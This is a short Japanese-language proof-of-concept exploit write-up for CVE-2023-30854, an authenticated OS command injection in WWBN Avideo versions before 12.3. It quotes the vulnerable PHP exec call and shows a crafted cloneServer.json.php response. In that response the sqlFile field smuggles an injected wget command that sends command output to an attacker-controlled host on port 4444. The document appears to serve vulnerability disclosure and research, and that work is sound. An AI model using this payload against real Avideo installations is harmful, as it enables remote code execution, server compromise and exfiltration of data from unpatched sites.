
CVE-2023-30854の概念実証エクスプロイト: WWBN Avideo < 12.3における認証済みOSコマンドインジェクションにより、巧妙に細工されたクローンサーバーのレスポンスを介してリモートコード実行を可能にします。
CVE-2023-30854 WWBN Avideo < 12.3 認証済みRCE
認証されたエンドポイント /plugin/CloneSite/cloneClient.json.php におけるOSコマンドインジェクションの脆弱性により、攻撃者がリモートコード実行を達成できます。
脆弱性コード:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
管理者パネルのクローンサイト機能を通じて、$objClone->cloneSiteURL を制御できます。
/plugin/CloneSite/cloneClient.json.php は {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php にGETリクエストを送信します。私は特別に細工した cloneServer.json.php をホストし、以下のJSONデータを出力させました。
{"error":false,"msg":"","url":"https:\/\/REDACTED\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}
/plugin/CloneSite/cloneClient.json.php にGETリクエストを送信すると、リモートコード実行が達成されます。
